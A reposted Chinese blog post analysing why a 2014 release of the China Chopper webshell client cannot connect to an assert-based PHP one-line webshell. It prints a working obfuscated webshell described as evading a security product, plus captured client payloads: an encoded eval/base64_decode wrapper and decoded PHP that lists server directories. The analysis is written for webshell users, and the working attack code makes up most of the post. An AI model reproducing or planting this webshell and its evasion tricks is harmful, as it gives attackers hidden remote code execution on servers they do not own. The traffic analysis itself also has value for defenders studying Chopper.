转载

新版中国菜刀（20141213）一句话不支持php assert分析

前几天下了新版的菜刀，今天发现一个php一句话连不上，但是旧版的菜刀可以连，而且新版是可以连接eval的php一句话。当时挺好奇，排除了非菜刀造成的可能性，就只能是菜刀更新的问题，所以接下来要做的就是分析新版和老版菜刀，并做对比。

0×01. 抓包分析

对新版菜刀抓包

在远程的服务器上放了一个过某狗的php一句话，文件名为xxoo.php，内容如下

<?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // 密码-7 ?>

新版菜刀连接后，出现下图错误。

新版中国菜刀（20141213）一句话不支持php assert分析

用wireshark抓包，观察http的request和response

wireshark过滤条件：ip.addr==xx.xx.xx.xx and http，设置完成后，点击开始capture。现在回到菜刀，右键菜刀的文件管理，出现上图的错误后，即可抓到如下两个包，一个request，一个response

新版中国菜刀（20141213）一句话不支持php assert分析

注意，如果是本地localhost服务器的话，wireshark不能直接抓包，具体可以百度或者用burp。

菜刀整个post数据一共有三个变量

变量一：

-7=$xx=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$yy=$_POST;@eval/**/($xx/**/($yy[z0]));

解密后为：@eval/**/(base64_decode/**/($_POST[z0]));还有两个%01，因为没有影响就不写了。

变量二：

z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKGdldF9tYWdpY19xdW90ZXNfZ3BjKCk/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdKTskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuIi8iLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJ8PC0iKTtkaWUoKTs=

通过上面@eval/**/(base64_decode/**/($_POST[z0]));可以知道z0是经过base64编码的，那么解码后为：

@ini_set("display_errors", "0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo ("->|");; $D = base64_decode(get_magic_quotes_gpc() ? stripslashes($_POST["z1"]) : $_POST["z1"]); $F = @opendir($D); if ($F == NULL) {  echo ("ERROR:// Path Not Found Or No Permission!"); } else {  $M = NULL;  $L = NULL;  while ($N = @readdir($F)) {   $P = $D . "/" . $N;   $T = @date("Y-m-d H:i:s", @filemtime($P));   @$E = substr(base_convert(@fileperms($P) , 10, 8) , -4);   $R = "/t" . $T . "/t" . @filesize($P) . "/t" . $E . " ";   if (@is_dir($P)) $M.= $N . "/" . $R;   else $L.= $N . $R;  }  echo $M . $L;  @closedir($F); }; echo ("|<-"); die();

可以看出z0是遍历文件的作用。

变量三：

z1=QzpcXHdhbXBcXHd3d1xc

通过变量二可以知道z1也是base64编码的，那么z1解码后为C://wamp//www//，可以看出是z1遍历文件的文件路径。

对老版菜刀抓包

同理，

变量一：

-7=@eval(base64_decode($_POST[z0]));

变量二：

z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7

base64_decode后为：

ini_set("display_errors", "0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo ("->|");; $D = base64_decode($_POST["z1"]); $F = @opendir($D); if ($F == NULL) {  echo ("ERROR:// Path Not Found Or No Permission!"); } else {  $M = NULL;  $L = NULL;  while ($N = @readdir($F)) {   $P = $D . "/" . $N;   $T = @date("Y-m-d H:i:s", @filemtime($P));   @$E = substr(base_convert(@fileperms($P) , 10, 8) , -4);   $R = "/t" . $T . "/t" . @filesize($P) . "/t" . $E . " ";   if (@is_dir($P)) $M.= $N . "/" . $R;   else $L.= $N . $R;  }  echo $M . $L;  @closedir($F); }; echo ("|<-"); die(); ?>